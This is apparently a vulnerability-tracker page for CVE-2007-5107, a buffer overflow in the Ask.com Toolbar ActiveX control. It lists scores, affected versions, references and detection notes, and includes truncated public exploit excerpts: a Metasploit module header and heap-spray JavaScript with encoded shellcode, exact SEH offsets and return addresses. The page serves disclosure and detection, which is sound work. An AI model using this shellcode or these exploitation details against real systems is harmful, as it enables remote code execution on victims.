CVE-2007-5107
Published 2007-09-26
CVE-2007-5107: Stack-based buffer overflow in the AskJeevesToolBar.SettingsPlugin.1 ActiveX control in askBar.dll in IAC Search & Media ask.com Ask Toolbar 4.0.2.53 and…
Priority P346 · critical · 9.3 CVSS 2.0
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 35.86% (98.3th percentile)
Stack-based buffer overflow in the AskJeevesToolBar.SettingsPlugin.1 ActiveX control in askBar.dll in IAC Search & Media ask.com Ask Toolbar 4.0.2.53 and earlier allows remote attackers to execute arbitrary code via a long ShortFormat property value. NOTE: some of these details are obtained from third party information. NOTE: the researcher claims that this is the same as CVE-2007-5108, but there is insufficient detail for CVE-2007-5108 to be certain.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ask.com | ask_toolbar | <= 4.0.2.53 | — |
Detection & IOCs (extracted from sources)
- Detect exploitation attempts targeting the AskJeevesToolBar.SettingsPlugin.1 ActiveX control via an overly long ShortFormat property value set in JavaScript (e.g., `vname.ShortFormat = strname` where strname is a large string).
- The exploit uses a heap-spray technique with a NOP sled targeting address 0x0d0d0d0d; monitor for large JavaScript heap allocations combined with ActiveX instantiation of AskJeevesToolBar.SettingsPlugin.1.
- SEH-based overflow: the Metasploit module uses generate_seh_payload with a return address overwrite at offset 2876 (XP SP0/SP1) or 1716 (Win2000). Detect abnormally long ShortFormat property strings in HTML pages instantiating the askBar.dll ActiveX control.
- Payload bad characters for this exploit are null byte, tab, newline, carriage return, single quote, and backslash (\x00\x09\x0a\x0d'\); shellcode in the wild will avoid these bytes.
- The vulnerability affects Ask Toolbar version 4.0.2.53 and earlier only; later versions are not affected.
- The return addresses (ROP/SEH gadgets) are version- and OS-specific: 0x71aa32ad for Windows XP SP0/SP1 English and 0x75022ac4 for Windows 2000 Pro English ALL; detections relying on these exact values will not generalize across other OS versions.
- The researcher notes this CVE may overlap with CVE-2007-5108, but there is insufficient detail to confirm they are the same vulnerability.
GHSA
GHSA-v682-76g4-2gwm: Stack-based buffer overflow in the AskJeevesToolBar
ghsa_unreviewed·2022-05-01·CVSS 10.0
CVE-2007-5107 [CRITICAL] CWE-119 GHSA-v682-76g4-2gwm: Stack-based buffer overflow in the AskJeevesToolBar
GHSA
GHSA-gv44-wp79-c9g9: Unspecified vulnerability in IAC Search & Media ask
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-5108 [CRITICAL] GHSA-gv44-wp79-c9g9: Unspecified vulnerability in IAC Search & Media ask
Unspecified vulnerability in IAC Search & Media ask.com toolbar has unknown impact and remote attack vectors. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine. NOTE: this might be the same issue as CVE-2007-5107.
No detection rules found.
Exploit-DB
Ask.com Toolbar - 'askBar.dll' ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-5107 Ask.com Toolbar - 'askBar.dll' ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: ask_shortformat.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.
An attacker may be able to excute arbitrary code by sending an overly
long string to the "ShortFormat()" method in askbar.dll.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revis
Exploit-DB
Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow
exploitdb·2007-09-24
CVE-2007-5108 Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow
---
// This is new technique I invent call 'heap fill attack'
var str0ke = 0x0d0d0d0d;
var sucks = unescape( // Launch the system calculator 100 times because what else?
// This code currently not work on Solaris/Sparc
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
var dick = 0x400000;
var j0hnson = sucks.length
Metasploit
Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
metasploit
This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53. An attacker may be able to execute arbitrary code by sending an overly long string to the "ShortFormat()" method in askbar.dll.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/26960
- http://www.foxitsoftware.com/pdf/reader/security.htm
- http://www.securityfocus.com/archive/1/480459/100/0/threaded
- http://www.securityfocus.com/bid/25785
- http://www.vupen.com/english/advisories/2007/3265
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36757
- https://www.exploit-db.com/exploits/4452